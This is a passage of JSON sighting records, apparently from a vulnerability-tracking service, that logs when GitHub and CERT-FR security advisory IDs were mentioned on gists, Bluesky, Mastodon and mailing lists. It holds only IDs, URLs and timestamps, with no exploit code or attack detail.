"2025-09-24T20:42:49.932356Z"}, {"uuid": "dcc58feb-b047-481f-8d98-3557d3875c3d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f82v-jwr5-mffw", "type": "seen", "source": "https://gist.github.com/JordoTaylor/386435f386c4c6cdbd5eaa512832d448", "content": "", "creation_timestamp": "2025-09-25T01:51:39.000000Z"}, {"uuid": "00745aa1-95b4-4d3f-8cd3-d79eae7f3dad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-954c-jjx6-cxv7", "type": "seen", "source": "https://gist.github.com/JordoTaylor/386435f386c4c6cdbd5eaa512832d448", "content": "", "creation_timestamp": "2025-09-25T01:51:39.000000Z"}, {"uuid": "a2bf6a82-c31b-4d9c-8698-18bb4ea4db8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-59j7-ghrg-fj52", "type": "seen", "source": "https://gist.github.com/konard/2ff9a6fa418617d15e04215879303545", "content": "", "creation_timestamp": "2025-11-04T02:05:53.000000Z"}, {"uuid": "ef98038a-0c6a-4596-9bec-a8b2bad73656", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-036", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3lxrmivk4c62n", "content": "", "creation_timestamp": "2025-09-01T12:36:10.752538Z"}, {"uuid": "1079dc0d-9e13-497d-a430-441d2bbe36dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-036", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3lxrmupq7xv2p", "content": "", "creation_timestamp": "2025-09-01T12:42:46.883546Z"}, {"uuid": "ffd9667e-5bf6-4699-b8c9-a36e20631973", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cgrx-mc8f-2prm", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115504728778207295", "content": "", "creation_timestamp": "2025-11-06T20:51:33.753296Z"}, {"uuid": "01739140-d817-4cfb-ad2d-a97d2939f2f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qw9x-cqr3-wc7r", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115504728778207295", "content": "", "creation_timestamp": "2025-11-06T20:51:33.844734Z"}, {"uuid": "429b096b-527d-4e42-a1f6-706f786f5a19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8frv-q972-9rq5", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115612168819994275", "content": "", "creation_timestamp": "2025-11-25T20:14:57.704915Z"}, {"uuid": "17f40a01-0280-4d45-b7fc-05df475a5453", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4342-x723-ch2f", "type": "seen", "source": "https://gist.github.com/deepak-chowdry/3da737fb0b4c63ed1bfe586c677e4860", "content": "", "creation_timestamp": "2025-12-02T03:16:32.000000Z"}, {"uuid": "cfaa17e5-29a4-434c-a55b-78cf2f050bb9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mh29-5h37-fv8m", "type": "seen", "source": "https://gist.github.com/deepak-chowdry/3da737fb0b4c63ed1bfe586c677e4860", "content": "", "creation_timestamp": "2025-12-02T03:16:32.000000Z"}, {"uuid": "72a5bd39-4558-4844-8b72-078ff55a0baf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mxvv-97wh-cfmm", "type": "seen", "source": "https://bsky.app/profile/sambowne.infosec.exchange.ap.brid.gy/post/3lxxkuiyea422", "content": "", "creation_timestamp": "2025-09-03T21:23:22.515452Z"}, {"uuid": "2179f86d-c334-4a07-9d7d-ac688089b6c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qpr4-c339-7vq8", "type": "seen", "source": "https://bsky.app/profile/azu.bsky.social/post/3ly3tm25ylf2r", "content": "", "creation_timestamp": "2025-09-05T14:09:49.413633Z"}, {"uuid": "80dc2362-fda8-4fba-8bd0-027f03459379", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q3hc-j9x5-mp9m", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115656312953420468", "content": "", "creation_timestamp": "2025-12-03T15:21:23.856594Z"}, {"uuid": "0766e653-0281-4408-b749-2117bb4d76c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9qr9-h5gf-34mp", "type": "seen", "source": "https://bsky.app/profile/hnws.bsky.social/post/3m73vpks5fm2i", "content": "", "creation_timestamp": "2025-12-03T16:43:56.333405Z"}, {"uuid": "8ba64435-0a31-4808-93ff-19f5685e90da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9qr9-h5gf-34mp", "type": "seen", "source": "https://bsky.app/profile/hnbot.gsuscs.xyz/post/3m73wn646xc2m", "content": "", "creation_timestamp": "2025-12-03T17:00:30.015260Z"}, {"uuid": "b03cd9dd-aaca-4afe-a98b-21c65006e4ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cj9g-v5mq-qrjm", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115656722756256466", "content": "", "creation_timestamp": "2025-12-03T17:05:36.998395Z"}, {"uuid": "c740f704-89d3-4e44-a655-512ebd7fe473", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9qr9-h5gf-34mp", "type": "seen", "source": "https://bsky.app/profile/betterhn20.e-work.xyz/post/3m73x254zxc2e", "content": "", "creation_timestamp": "2025-12-03T17:07:45.298127Z"}, {"uuid": "913e8df8-0a3a-4d8c-aebb-ae15fec94a58", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f469-jh82-97fv", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115656748477885093", "content": "", "creation_timestamp": "2025-12-03T17:12:09.711561Z"}, {"uuid": "78e7a579-472b-4c1f-81cc-f39a7f024dc6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-prhc-chfw-32jg", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115656755616258132", "content": "", "creation_timestamp": "2025-12-03T17:13:58.141718Z"}, {"uuid": "71f933f4-27ac-40c4-860f-6fd8226dd1f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9qr9-h5gf-34mp", "type": "seen", "source": "https://bsky.app/profile/hackernewstop5.bsky.social/post/3m73xquipth2f", "content": "", "creation_timestamp": "2025-12-03T17:20:28.269036Z"}, {"uuid": "f84b8078-6cdb-4a02-bd34-b8d548d4e510", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9qr9-h5gf-34mp", "type": "seen", "source": "https://bsky.app/profile/betterhn50.e-work.xyz/post/3m73zvshke42g", "content": "", "creation_timestamp": "2025-12-03T17:59:01.427978Z"}, {"uuid": "672f0e54-4a1d-4b47-be98-8034e73eca2e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-46gc-mwh4-cc5r", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115656962660505423", "content": "", "creation_timestamp": "2025-12-03T18:06:37.675161Z"}, {"uuid": "245eceb6-1276-4d54-9566-fa5b6fbc24fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9qr9-h5gf-34mp", "type": "seen", "source": "https://bsky.app/profile/hn100.atproto.rocks/post/3m743nng6e322", "content": "", "creation_timestamp": "2025-12-03T18:30:15.237650Z"}, {"uuid": "f409e62e-2f2c-48c9-bfe3-e7313d87fced", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xq4m-mc3c-vvg3", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115657061255075293", "content": "", "creation_timestamp": "2025-12-03T18:31:41.839143Z"}, {"uuid": "e5e9d8f5-138f-48a8-83bc-1d8ecee8fa5c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-j3q6-q5pc-v5wf", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115657066080526795", "content": "", "creation_timestamp": "2025-12-03T18:32:55.504777Z"}, {"uuid": "69d9f02c-c3b7-456d-ab84-31eacbc43d73", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9qr9-h5gf-34mp", "type": "seen", "source": "https://gist.github.com/MarkKropf/d83a36184fc0c4b3eed362cdc6fe119e", "content": "", "creation_timestamp": "2025-12-03T18:34:34.000000Z"}, {"uuid": "92b78d36-84ce-43c2-9096-b9f825453cf0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9qr9-h5gf-34mp", "type": "seen", "source": "https://bsky.app/profile/hnfeed.bsky.social/post/3m745if5mac2y", "content": "", "creation_timestamp": "2025-12-03T19:03:05.481554Z"}, {"uuid": "8c7836ee-ebb4-4956-afc3-30276b30c220", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v8v5-c872-mf8r", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115657293148457938", "content": "", "creation_timestamp": "2025-12-03T19:30:40.684702Z"}, {"uuid": "52cf2c59-0b5f-4871-a524-706659fb1271", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rwjg-c3h2-f57p", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115657295894964096", "content": "", "creation_timestamp": "2025-12-03T19:31:22.138366Z"}, {"uuid": "30f55fe0-1ea6-4453-8b7b-c8ca9a011a5c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v3c6-w996-f7hx", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115657356574586752", "content": "", "creation_timestamp": "2025-12-03T19:46:48.077241Z"}, {"uuid": "21b30c8e-a457-4e78-8dc7-6d8c95496951", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9qr9-h5gf-34mp", "type": "seen", "source": "https://bsky.app/profile/neuralmarkets.substack.com/post/3m74brxrhri2r", "content": "", "creation_timestamp": "2025-12-03T20:20:02.278806Z"}, {"uuid": "fe07b1dd-611d-40dd-996d-852d5ea8b954", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9qr9-h5gf-34mp", "type": "seen", "source": "https://bsky.app/profile/newsyc200.bsky.social/post/3m74bxxvig72s", "content": "", "creation_timestamp": "2025-12-03T20:23:23.364025Z"}, {"uuid": "86d72171-af25-426a-bdfa-a22e15489385", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9r3w-4j8q-pw98", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115657563853838944", "content": "", "creation_timestamp": "2025-12-03T20:39:31.016456Z"}, {"uuid": "13e36115-8092-4543-aaaf-91d37a4ec429", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9mpm-9pxh-mg4f", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115657592254208627", "content": "", "creation_timestamp": "2025-12-03T20:46:44.284825Z"}, {"uuid": "74a58707-e5f1-4ae1-8ff7-f0154ab307a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wvxp-jp4w-w8wg", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115657594616316301", "content": "", "creation_timestamp": "2025-12-03T20:47:20.412050Z"}, {"uuid": "16431079-eb22-414c-8a98-35c7f3eb0e42", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9qr9-h5gf-34mp", "type": "seen", "source": "https://bsky.app/profile/newsyc250.bsky.social/post/3m74fdbywdt24", "content": "", "creation_timestamp": "2025-12-03T21:23:24.549070Z"}, {"uuid": "5f2d4d6d-7dd0-404c-96cd-86069e559aaa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fv66-9v8q-g76r", "type": "seen", "source": "https://bsky.app/profile/poc-popoyama.misskey.systems.ap.brid.gy/post/3m74gz24rli62", "content": "", "creation_timestamp": "2025-12-03T21:53:37.539906Z"}, {"uuid": "a4d7d715-a314-4666-a7df-6f1fad2f17c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9qr9-h5gf-34mp", "type": "seen", "source": "https://bsky.app/profile/poc-popoyama.misskey.systems.ap.brid.gy/post/3m74gz24rli62", "content": "", "creation_timestamp": "2025-12-03T21:53:37.633551Z"}, {"uuid": "db75506f-72f2-4fb0-9b7c-809c4fb2ea7f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9qr9-h5gf-34mp", "type": "seen", "source": "https://bsky.app/profile/betterhn300.e-work.xyz/post/3m74imn2wih2g", "content": "", "creation_timestamp": "2025-12-03T22:22:19.950839Z"}, {"uuid": "c84bba14-74ab-4845-917e-c707da7ad3f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9qr9-h5gf-34mp", "type": "seen", "source": "https://gist.github.com/sjagoori/7972551ad9c319d37780b80be8366f65", "content": "", "creation_timestamp": "2025-12-03T23:25:32.000000Z"}, {"uuid": "a3b1a1c6-abe6-496e-9205-322445f92f24", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9qr9-h5gf-34mp", "type": "seen", "source": "https://gist.github.com/sjagoori/25af87c2b1e06dc417abe886562299fc", "content": "", "creation_timestamp": "2025-12-04T00:10:25.000000Z"}, {"uuid": "c41e0d4a-3ce3-42f6-bd41-4bbb2879c125", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9qr9-h5gf-34mp", "type": "seen", "source": "https://gist.github.com/tluyben/f8051d0557025add079e377f1395182f", "content": "", "creation_timestamp": "2025-12-04T00:57:55.000000Z"}, {"uuid": "020389f4-85db-432a-9ad4-15b0e8e30a3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9qr9-h5gf-34mp", "type": "seen", "source": "https://bsky.app/profile/hnbest.bsky.social/post/3m75iw2cx572n", "content": "", "creation_timestamp": "2025-12-04T08:00:14.781457Z"}, {"uuid": "5d1159e5-b390-4641-8125-9a5e6616f274", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9qr9-h5gf-34mp", "type": "seen", "source": "https://bsky.app/profile/newsyc500.bsky.social/post/3m75kr7sh2o2z", "content": "", "creation_timestamp": "2025-12-04T08:33:20.570113Z"}, {"uuid": "69385a13-4d6f-4f3d-81e4-8cf2cfc192ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9qr9-h5gf-34mp", "type": "seen", "source": "https://bsky.app/profile/topickapp.bsky.social/post/3m75lyqhod52k", "content": "", "creation_timestamp": "2025-12-04T08:55:27.128258Z"}, {"uuid": "a9048f97-3092-4b65-a2c2-b5e04128bf48", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9qr9-h5gf-34mp", "type": "seen", "source": "https://bsky.app/profile/kdmsnr.com/post/3m75mms4ahc2c", "content": "", "creation_timestamp": "2025-12-04T09:06:39.137331Z"}, {"uuid": "a1293b42-f0df-4044-bd45-524d9640b988", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-053", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/115660536712540587", "content": "", "creation_timestamp": "2025-12-04T09:15:35.495977Z"}, {"uuid": "d0ba8f26-b908-4be8-9649-2013d643efc3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gm62-xv2j-4w53", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115667839038679986", "content": "", "creation_timestamp": "2025-12-05T16:12:37.836559Z"}, {"uuid": "38a081d4-1c51-4fd4-b0f0-f38d8be46d5c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2xpw-w6gg-jr37", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115667885290569342", "content": "", "creation_timestamp": "2025-12-05T16:24:23.529808Z"}, {"uuid": "23d0ce74-3cf4-47d7-b0c0-77d5c0e3b586", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-495w-cqv6-wr59", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115667959131777282", "content": "", "creation_timestamp": "2025-12-05T16:43:10.324400Z"}, {"uuid": "6d1ff193-6b7c-4045-a1ac-8fffc121f18d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qcw2-p26m-9gc5", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115667959131777282", "content": "", "creation_timestamp": "2025-12-05T16:43:10.417593Z"}, {"uuid": "a9a8cb62-d776-4227-ab90-76ee905a3166", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-whm3-vv55-gf27", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115667997784638676", "content": "", "creation_timestamp": "2025-12-05T16:53:00.168438Z"}, {"uuid": "8925864a-7dfe-4874-9eb1-061d66d82915", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hq6c-r898-fgf2", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115667997784638676", "content": "", "creation_timestamp": "2025-12-05T16:53:00.264753Z"}, {"uuid": "5e8ae4e4-1b38-4fd3-9722-c25f6fb8bad1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-ww9m-f8j4-jj9x", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115667997784638676", "content": "", "creation_timestamp": "2025-12-05T16:53:00.332308Z"}, {"uuid": "dba6a5fd-8feb-4920-a13f-dd902ab1b4a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7x2j-2674-fj95", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115668026058293996", "content": "", "creation_timestamp": "2025-12-05T17:00:11.507530Z"}, {"uuid": "84b0d36e-d53c-4065-b1b9-b635528bc089", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xm2j-vfr9-mg9m", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115668433399350507", "content": "", "creation_timestamp": "2025-12-05T18:43:47.082284Z"}, {"uuid": "b602989f-0752-47a3-a4c5-f16fe8100f84", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qjhq-rgmr-6c3g", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115668436476685112", "content": "", "creation_timestamp": "2025-12-05T18:44:34.323979Z"}, {"uuid": "14c457c4-b978-495a-b99e-692a8c11c1c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8wgw-5h6x-qgqg", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115668473852566476", "content": "", "creation_timestamp": "2025-12-05T18:54:05.954146Z"}, {"uuid": "0ec9cc53-9154-416a-a627-2ae6a6e72774", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cmp6-m4wj-q63q", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q4/248", "content": "", "creation_timestamp": "2025-12-05T16:53:55.000000Z"}, {"uuid": "c38a2bbd-9499-4897-bcf2-2ba9e45a408a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gm62-xv2j-4w53", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q4/250", "content": "", "creation_timestamp": "2025-12-05T17:54:47.000000Z"}, {"uuid": "0afd3a4a-2cdb-4ae1-a3a5-dcbc3e05021f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2xpw-w6gg-jr37", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q4/250", "content": "", "creation_timestamp": "2025-12-05T17:54:47.000000Z"}, {"uuid": "ed545a6a-b547-4068-a1fe-795e482b8ea9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xm2j-vfr9-mg9m", "type": "seen", "source": "https://bsky.app/profile/cyber-news-fi.bsky.social/post/3m7c2eonwe62y", "content": "", "creation_timestamp": "2025-12-06T03:23:18.401192Z"}, {"uuid": "8f398b1e-4a59-47b9-8d3d-cf7a5d3ca830", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9qr9-h5gf-34mp", "type": "seen", "source": "https://infosec.exchange/users/shadowserver/statuses/115672050969855947", "content": "", "creation_timestamp": "2025-12-06T10:03:49.605130Z"}, {"uuid": "cfdee13f-3ea4-4a51-9708-fe40145ecc39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9rwj-6rc7-p77c", "type": "seen", "source": "https://gist.github.com/N3mes1s/ff9ef7447f1da40797735eb5ec1bd726", "content": "", "creation_timestamp": "2025-12-10T21:05:03.000000Z"}, {"uuid": "ecab9e2f-6876-424a-b091-08320a402402", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-j5gq-897m-2rff", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115697668298607011", "content": "", "creation_timestamp": "2025-12-10T22:38:36.181624Z"}, {"uuid": "1bfc22fe-e006-4ffe-ad23-6f6cbf5bb16b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qhr6-6cgv-6638", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115697668298607011", "content": "", "creation_timestamp": "2025-12-10T22:38:36.267440Z"}, {"uuid": "7f3c33ec-cd98-4935-ba7d-c994a2c81407", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mr6f-h57v-rpj5", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115697668298607011", "content": "", "creation_timestamp": "2025-12-10T22:38:36.341834Z"}, {"uuid": "7aa381eb-8471-4467-833c-18828c2fd0a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vg28-83rp-8xx4", "type": "seen", "source": "https://bsky.app/profile/nixpkgssecuritychanges.gerbet.me/post/3m7o66wzd6q2a", "content": "", "creation_timestamp": "2025-12-10T23:03:38.000437Z"}, {"uuid": "4c3e301f-6d59-41c9-a63d-b411b0f992ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vg28-83rp-8xx4", "type": "seen", "source": "https://bsky.app/profile/nixpkgs-prs-bot.bsky.social/post/3m7obmrdszu2x", "content": "", "creation_timestamp": "2025-12-11T00:05:03.240645Z"}, {"uuid": "e76dec15-b018-402d-ac13-8715cf4050b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-898v-775g-777c", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115702065510292163", "content": "", "creation_timestamp": "2025-12-11T17:16:52.364158Z"}, {"uuid": "600bbb27-7be2-4dd2-a368-960344107dac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-j8g6-5gqc-mq36", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115702068572706362", "content": "", "creation_timestamp": "2025-12-11T17:17:39.060155Z"}, {"uuid": "4b9494aa-c698-4cc8-bc72-17617029b67d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 